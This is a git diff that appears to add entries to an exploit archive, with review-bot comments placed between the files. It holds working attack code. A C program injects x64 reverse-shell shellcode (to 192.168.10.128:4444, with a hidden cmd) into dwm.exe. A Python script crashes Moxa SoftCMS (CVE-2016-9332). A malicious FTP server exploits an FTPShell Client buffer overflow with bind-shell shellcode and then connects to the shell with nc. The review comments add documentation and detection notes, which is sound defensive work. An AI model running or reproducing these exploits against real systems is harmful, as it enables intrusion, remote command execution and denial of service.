+xor rdx,rdx + +;finding Export table of ws2_32.dll + +mov dl,0x88 +mov ebx,[rsi+0x3c] +add rbx,rsi +mov ebx,[rbx+rdx] +add rbx,rsi ;IMAGE_EXPORT_DIRECTORY + + +mov r15d,[rbx+0x1c] +add r15,rsi ;ws2_32.dll AddressOfFunctions + + +;-------------------------------------- + +;WSAStartup(514,&WSADATA) + +xor rdx,rdx +mov dx,114*4 +mov ebx,[r15+rdx] +add rbx,rsi ;rbx=WSAStartup() + + +mov dx,408 + +sub rsp,rdx +lea rdx,[rsp] +xor rcx,rcx +mov cx,514 + +sub rsp,88 ;reserving space for API call (Important) + +call rbx + 
+;------------------------------------------------------- +;WSASocketA(2,1,6,0,0,0) + +xor rdx,rdx +sub rsp,88 + +mov [rsp+32],rdx +mov [rsp+40],rdx + + +inc rdx +mov rcx,rdx +inc rcx + +xor r8,r8 +add r8,6 + +xor r9,r9 + +mov r9w,98*4 +mov ebx,[r15+r9] +add rbx,rsi ;rbx=WSASocketA() + +xor r9,r9 +call rbx + +mov r13,rax ;r13=SOCKET + +;------------------------------------------ +xor r8,r8 +push r8 +push r8 + +mov [rsp],byte 2 +mov [rsp+2],word 0x5c11 ;port 4444 +mov [rsp+4],dword 0x800aa8c0 ;change it +lea r12,[rsp] +sub rsp,88 +;------------------------------------------- +;connect(SOCKET,(struct sockaddr *)&struct sockaddr_in,16) +c: +xor rbx,rbx +mov ebx,[r15+12] +add rbx,rsi ;rbx=connect() + + + +mov rdx,r12 +mov rcx,r13 +mov r8b,16 + + + +call rbx +xor r8,r8 +cmp rax,r8 +jnz c + +;---------------------------------------------------------------------------------------- +;Hiding Window +;---------------------------------------------------------------------------------------- + +;AllocConsole() +xor rbx,rbx +mov ebx,[r14+64] +add rbx,rdi ;rbx=AllocConsole() + +call rbx +;------------------------------ +;loading user32.dll + +xor rdx,rdx +push rdx +push rdx +mov [rsp],dword 'user' +mov [rsp+4],dword '32.d' +mov [rsp+8],word 'll' +lea rcx,[rsp] + +mov dx,831*4 +mov ebx,[r14+rdx] +add rbx,rdi +sub rsp,88 + +call rbx + +mov rsi,rax +;-------------------------------- + +xor rbx,rbx +xor rdx,rdx + +;---------------------------------- +;FindWindowA("ConsoleWindowClass",NULL) + +mov dx,586 +mov r12d,[r14+rdx*4] +add r12,rdi ;rbx=GetProcAddress() + +xor rcx,rcx +push rcx +push rcx +mov [rsp],dword 'Find' +mov [rsp+4],dword 'Wind' +mov [rsp+8],dword 'owAA' +xor byte [rsp+11],0x41 + +lea rdx,[rsp] +mov rcx,rsi + +sub rsp,88 +call r12 + + + +;----------------------------------- +xor rdx,rdx +push rdx +push rdx +push rdx + +mov [rsp],dword 'Cons' +mov [rsp+4],dword 'oleW' +mov [rsp+8],dword 'indo' +mov [rsp+12],dword 'wCla' +mov [rsp+16],word 'ss' + +lea rcx,[rsp] + +sub 
rsp,88 + +call rax + +mov r15,rax +xor rdx,rdx +;--------------------------------------- +;ShowWindow(HWND,0) + +xor rcx,rcx +push rcx +push rcx +mov [rsp],dword 'Show' +mov [rsp+4],dword 'Wind' +mov [rsp+8],word 'ow' + +lea rdx,[rsp] +mov rcx,rsi + +sub rsp,88 +call r12 + + +mov rcx,r15 +xor rdx,rdx +sub rsp,88 +call rax + +;----------------------------------------------- + +;-------------------------------------------------------------------------------------------------------------------------------- +;CreateProcessA() +mov dx,164*4 +mov ebx,[r14+rdx] +add rbx,rdi + + +;STARTUPINFOA+PROCESS_INFORMATION +;---------------------------------- +sub rsp,104 +sub rsp,24 +lea r12,[rsp] + +mov dl,104 + +xor rcx,rcx +mov [r12],dword edx +mov [r12+4],rcx +mov [r12+12],rcx +mov [r12+20],rcx +mov [r12+24],rcx + +xor rdx,rdx +mov dl,255 +inc rdx + +mov [r12+0x3c],edx +mov [r12+0x50],r13 +mov [r12+0x58],r13 +mov [r12+0x60],r13 + +;-------------------------------------------------- + +push 'cmdA' +mov [rsp+3],byte dl + +lea rdx,[rsp] + +inc rcx +;------------------------------------- +sub rsp,88 + +mov [rsp+32],rcx +xor rcx,rcx + +xor r8,r8 + +mov [rsp+40],r8 +mov [rsp+48],r8 +mov [rsp+56],r8 +lea r9,[r12] +mov [rsp+64],r9 +lea r9,[r12+104] +mov [rsp+72],r9 + +xor r9,r9 + +call rbx + +;------------------------------- + +xor rdx,rdx +mov dx,296*4 +mov ebx,[r14+rdx] +add rbx,rdi + +xor rcx,rcx +call rbx + + + + +*/ + + + + + + +#include +#include +#include +#include + + +char 
shellcode[]="\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x44\x8b\x73\x1c\x49\x01\xfe\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x52\x52\xc7\x04\x24\x77\x73\x32\x5f\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x83\xc4\x68\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\xb2\x88\x8b\x5e\x3c\x48\x01\xf3\x8b\x1c\x13\x48\x01\xf3\x44\x8b\x7b\x1c\x49\x01\xf7\x48\x31\xd2\x66\xba\xc8\x01\x41\x8b\x1c\x17\x48\x01\xf3\x66\xba\x98\x01\x48\x29\xd4\x48\x8d\x14\x24\x48\x31\xc9\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x48\x83\xec\x58\x48\x89\x54\x24\x20\x48\x89\x54\x24\x28\x48\xff\xc2\x48\x89\xd1\x48\xff\xc1\x4d\x31\xc0\x49\x83\xc0\x06\x4d\x31\xc9\x66\x41\xb9\x88\x01\x43\x8b\x1c\x0f\x48\x01\xf3\x4d\x31\xc9\xff\xd3\x49\x89\xc5\x4d\x31\xc0\x41\x50\x41\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x0a\x80\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x31\xdb\x41\x8b\x5f\x0c\x48\x01\xf3\x4c\x89\xe2\x4c\x89\xe9\x41\xb0\x10\xff\xd3\x4d\x31\xc0\x4c\x39\xc0\x75\xe3\x48\x31\xdb\x41\x8b\x5e\x40\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x52\xc7\x04\x24\x75\x73\x65\x72\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x58\xff\xd3\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\x66\xba\x4a\x02\x45\x8b\x24\x96\x49\x01\xfc\x48\x31\xc9\x51\x51\xc7\x04\x24\x46\x69\x6e\x64\xc7\x44\x24\x04\x57\x69\x6e\x64\xc7\x44\x24\x08\x6f\x77\x41\x41\x80\x74\x24\x0b\x41\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x48\x31\xd2\x52\x52\x52\xc7\x04\x24\x43\x6f\x6e\x73\xc7\x44\x24\x04\x6f\x6c\x65\x57\xc7\x44\x24\x08\x69\x6e\x64\x6f\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\xc7\x44\x24\x10\x73\x73\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x49\x89\xc7\x48\x31\xd2\x48\x31\xc9\x51\x51\xc7\x04\x24\x53\x68\x6f\x77\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\xc7\x44\x24\x0
8\x6f\x77\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x4c\x89\xf9\x48\x31\xd2\x48\x83\xec\x58\xff\xd0\x66\xba\x90\x02\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x68\x48\x83\xec\x18\x4c\x8d\x24\x24\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\x48\x31\xd2\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x4d\x89\x6c\x24\x50\x4d\x89\x6c\x24\x58\x4d\x89\x6c\x24\x60\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x48\x8d\x14\x24\x48\xff\xc1\x48\x83\xec\x58\x48\x89\x4c\x24\x20\x48\x31\xc9\x4d\x31\xc0\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x4d\x8d\x0c\x24\x4c\x89\x4c\x24\x40\x4d\x8d\x4c\x24\x68\x4c\x89\x4c\x24\x48\x4d\x31\xc9\xff\xd3\x48\x31\xd2\x66\xba\xa0\x04\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xc9\xff\xd3"; + + + + +void inject(DWORD ); +int main() +{ + char program_name[]="dwm.exe"; //Process name to inject. change it if U Want + + BOOL f=0; + HANDLE snap; + PROCESSENTRY32 pe32; + + snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); + + if(snap==INVALID_HANDLE_VALUE) + { + printf("CreateToolhelp32Snapshot() Failed."); return 0; + } + + pe32.dwSize=sizeof(pe32); + + if(!Process32First(snap,&pe32)) + { + printf("Process32First() Failed."); return 0; + } + + + + do + { + if(0==strncmp(program_name,pe32.szExeFile,strlen(program_name))) + { + f=TRUE; + break; + } + + }while(Process32Next(snap,&pe32)); + + + if(!f) + { + printf("No infomation found about \"%s\" ",program_name); + } + else + { + printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID); + printf("\nInjecting shellcode"); + inject(pe32.th32ProcessID); + } + + + + return 0; + +} + + + +void inject(DWORD pid) +{ + HANDLE phd,h; + LPVOID shell; + + phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid); + + if(phd==INVALID_HANDLE_VALUE) + { + printf("\nOpenProcess() Failed."); return ; + } + + shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE); + if(shell==NULL) + { + printf("\nVirtualAllocEx() 
Failed"); CloseHandle(phd); return ; + } + + WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0); + printf("\nInjection successfull\n"); + printf("Running Shellcode......\n"); + + h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0); + if(h==NULL) + { + printf("Failed to Run Shellcode\n"); return ; + } + else + printf("shellcode Execution Successfull"); +} + + + + + + + diff --git a/platforms/windows/dos/40779.py b/platforms/windows/dos/40779.py new file mode 100755 index 000000000..fc112c9d1 --- /dev/null +++ b/platforms/windows/dos/40779.py @@ -0,0 +1,33 @@ +''' +# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability +# Author: Zhou Yu +# Email: 504137480@qq.com +# Vendor: http://www.moxa.com/ +# Versions affected: 1.5 or prior versions +# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32 +# CVE: CVE-2016-9332 +# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02 + +Vulnerability Description: +AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition. + + +Vulnerability Discovery Method: +With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS . +''' + +import socket +host = '192.168.124.128' +port = 81 + +# extracted four payloads from crashes that can crash the AspWebServer.exe +payload1 = 'GET /\ HTTP/1.1\r\n\r\n' +payload2 = 'GET \x00 HTTP/1.1\r\n\r\n' +payload3 = 'GET \n HTTP/1.1\r\n\r\n' +payload4 = 'GET /. HTTP/1.1\r\n\r\n' + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) +s.send(payload1) +s.close() + 
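Review bot: The header comment gives title, size and test platform but no summary of what the sample does, so the callback endpoint is only discoverable as `0x800aa8c0` / `0x5c11` in the listing and the injection target only as the `program_name` string in main(). A short block comment above `main`, along the lines of `/* Injects into dwm.exe via OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread; payload connects to 192.168.10.128:4444 */`, would let an analyst triage the file without reading the disassembly. That call sequence is also what endpoint telemetry keys on (for example Sysmon event 8 for CreateRemoteThread and event 10 for the PROCESS_ALL_ACCESS open), which is worth stating for readers who use the entry to validate detections.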
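Review bot: The comment above the payloads says four request lines crash AspWebServer.exe, but only `payload1` is passed to `s.send()`; `payload2` to `payload4` are never used and nothing in the docstring says so. For anyone building a detection or regression check from this entry, a comment such as `# only payload1 is sent; payload2-4 are the other crashing request lines reported by the fuzzer` would make clear that all four patterns matter. The docstring cites ICSA-16-322-02 but gives no remediation; it could point to that advisory for the fixed release and note that port 81 should not be reachable from untrusted networks in the meantime.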
diff --git a/platforms/windows/dos/40784.html b/platforms/windows/dos/40784.html new file mode 100755 index 000000000..7c118edc1 --- /dev/null +++ b/platforms/windows/dos/40784.html @@ -0,0 +1,48 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40785.html b/platforms/windows/dos/40785.html new file mode 100755 index 000000000..10018e1a5 --- /dev/null +++ b/platforms/windows/dos/40785.html @@ -0,0 +1,168 @@ + + + + + + + + diff --git a/platforms/windows/dos/40786.html b/platforms/windows/dos/40786.html new file mode 100755 index 000000000..87bf72498 --- /dev/null +++ b/platforms/windows/dos/40786.html @@ -0,0 +1,82 @@ + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40787.html b/platforms/windows/dos/40787.html new file mode 100755 index 000000000..735988025 --- /dev/null +++ b/platforms/windows/dos/40787.html @@ -0,0 +1,88 @@ + + + + + + + + + + + diff --git a/platforms/windows/remote/40778.py b/platforms/windows/remote/40778.py new file mode 100755 index 000000000..85ce72eb7 --- /dev/null +++ b/platforms/windows/remote/40778.py 
@@ -0,0 +1,113 @@
+# -*- coding: utf-8 -*-
+
+# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow
+# Date: 16/11/2016
+# Author: Yunus YILDIRIM (Th3GundY)
+# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com
+# Author Website: http://yildirimyunus.com
+# Contact: yunusyildirim@protonmail.com
+# Software Link: http://www.ftpshell.com/downloadclient.htm
+# Tested on: Windows XP Professional SP 2
+# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit
+
+import socket
+import sys
+import os
+import time
+
+
+def banner():
+ banner = "\n\n"
+ banner += " ██████╗████████╗ ███████╗███████╗██████╗ ██████╗ \n"
+ banner += " ██╔════╝╚══██╔══╝ ╚══███╔╝██╔════╝██╔══██╗██╔═████╗ \n"
+ banner += " ██║ ██║█████╗ ███╔╝ █████╗ ██████╔╝██║██╔██║ \n"
+ banner += " ██║ ██║╚════╝███╔╝ ██╔══╝ ██╔══██╗████╔╝██║ \n"
+ banner += " ╚██████╗ ██║ ███████╗███████╗██║ ██║╚██████╔╝ \n"
+ banner += " ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝ \n"
+ banner += " \n"
+ print banner
+
+
+def usage():
+ banner()
+ print "[-] Missing arguments\n"
+ print "[*] Usage: python FTPShell-exploit.py target_os"
+ print "[*] Target types:\n\tWindows XP -> winxp\n\tWindows 7-32bit -> win7_32\n\tWindows 7-64bit -> win7_64\n"
+ sys.exit(0)
+
+
+def exploit(target_eip):
+ s0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s0ck3t.bind(("0.0.0.0", 21))
+ s0ck3t.listen(5)
+ print "[*] CT-Zer0 Evil FTP Server Listening port 21\n"
+
+ # \x00\x0a\x0d\x22\xff
+ # msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b '\x00\x0a\x0d\x22\xff'
+ shellcode = ("\xbb\x61\xad\x84\xdf\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
+ "\x53\x31\x5a\x12\x83\xc2\x04\x03\x3b\xa3\x66\x2a\x47\x53\xe4"
+ "\xd5\xb7\xa4\x89\x5c\x52\x95\x89\x3b\x17\x86\x39\x4f\x75\x2b"
+ "\xb1\x1d\x6d\xb8\xb7\x89\x82\x09\x7d\xec\xad\x8a\x2e\xcc\xac"
+ "\x08\x2d\x01\x0e\x30\xfe\x54\x4f\x75\xe3\x95\x1d\x2e\x6f\x0b"
+ "\xb1\x5b\x25\x90\x3a\x17\xab\x90\xdf\xe0\xca\xb1\x4e\x7a\x95"
+ "\x11\x71\xaf\xad\x1b\x69\xac\x88\xd2\x02\x06\x66\xe5\xc2\x56"
+ "\x87\x4a\x2b\x57\x7a\x92\x6c\x50\x65\xe1\x84\xa2\x18\xf2\x53"
+ "\xd8\xc6\x77\x47\x7a\x8c\x20\xa3\x7a\x41\xb6\x20\x70\x2e\xbc"
+ "\x6e\x95\xb1\x11\x05\xa1\x3a\x94\xc9\x23\x78\xb3\xcd\x68\xda"
+ "\xda\x54\xd5\x8d\xe3\x86\xb6\x72\x46\xcd\x5b\x66\xfb\x8c\x33"
+ "\x4b\x36\x2e\xc4\xc3\x41\x5d\xf6\x4c\xfa\xc9\xba\x05\x24\x0e"
+ "\xbc\x3f\x90\x80\x43\xc0\xe1\x89\x87\x94\xb1\xa1\x2e\x95\x59"
+ "\x31\xce\x40\xf7\x39\x69\x3b\xea\xc4\xc9\xeb\xaa\x66\xa2\xe1"
+ "\x24\x59\xd2\x09\xef\xf2\x7b\xf4\x10\xea\x63\x71\xf6\x78\x84"
+ "\xd7\xa0\x14\x66\x0c\x79\x83\x99\x66\xd1\x23\xd1\x60\xe6\x4c"
+ "\xe2\xa6\x40\xda\x69\xa5\x54\xfb\x6d\xe0\xfc\x6c\xf9\x7e\x6d"
+ "\xdf\x9b\x7f\xa4\xb7\x38\xed\x23\x47\x36\x0e\xfc\x10\x1f\xe0"
+ "\xf5\xf4\x8d\x5b\xac\xea\x4f\x3d\x97\xae\x8b\xfe\x16\x2f\x59"
+ "\xba\x3c\x3f\xa7\x43\x79\x6b\x77\x12\xd7\xc5\x31\xcc\x99\xbf"
+ "\xeb\xa3\x73\x57\x6d\x88\x43\x21\x72\xc5\x35\xcd\xc3\xb0\x03"
+ "\xf2\xec\x54\x84\x8b\x10\xc5\x6b\x46\x91\xf5\x21\xca\xb0\x9d"
+ "\xef\x9f\x80\xc3\x0f\x4a\xc6\xfd\x93\x7e\xb7\xf9\x8c\x0b\xb2"
+ "\x46\x0b\xe0\xce\xd7\xfe\x06\x7c\xd7\x2a")
+
+ buffer = "A" * 400 + target_eip + "\x90" * 40 + shellcode
+
+ while True:
+ victim, addr = s0ck3t.accept()
+ victim.send("220 CT-Zer0 Evil FTP Service\r\n")
+ print "[*] Connection accepted from %s\n" % addr[0]
+ while True:
+ data = victim.recv(1024)
+ if "USER" in data:
+ victim.send("331 User name okay, need password\r\n\r\n")
+ print "\t[+] 331 USER = %s" % data.split(" ")[1],
+ elif "PASS" in data:
+ victim.send("230 Password accepted.\r\n230 User logged in.\r\n")
+ print "\t[+] 230 PASS = %s" % data.split(" ")[1],
+ elif "PWD" in data:
+ victim.send('257 "' + buffer + '" is current directory\r\n')
+ print "\t[+] 257 PWD"
+ print "\n[*] Exploit Sent Successfully\n"
+ time.sleep(2)
+ print '[+] You got bind shell on port 5656\n'
+ os.system('nc ' + str(addr[0]) + ' 5656')
+
+
+if len(sys.argv) != 2:
+ usage()
+else:
+ banner()
+ try:
+ if sys.argv[1] == "winxp":
+ # 7C80C75B JMP EBP kernel32.dll
+ target_eip = "\x5B\xC7\x80\x7C"
+ elif sys.argv[1] == "win7_32":
+ # 76ad0299 jmp ebp [kernel32.dll]
+ target_eip = "\x99\x02\xAD\x76"
+ elif sys.argv[1] == "win7_64":
+ # 7619dfce jmp ebp [kernel32.dll]
+ target_eip = "\xCE\xDF\x19\x76"
+ else:
+ usage()
+ exploit(target_eip)
+ except:
+ print "\n[O_o] KTHXBYE! [O_o]"
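Review bot: The header of 40778.py names the product and test platforms but never states which server reply triggers the overflow, and `buffer` in `exploit()` is built without a comment on its layout. A comment above that assignment such as `# 257 (PWD) reply path: 400 filler bytes, 4-byte return address, 40-byte NOP pad, payload` would make the trigger readable without decoding the blob. From a detection view the file shows two indicators: an FTP `257` reply whose quoted path exceeds 400 bytes and carries non-printable bytes, and, per the msfvenom comment, a new listener on TCP 5656 on the client host. The bare `except:` at the end also catches the `SystemExit` raised by `usage()` and any socket error, so every failure ends in the same message.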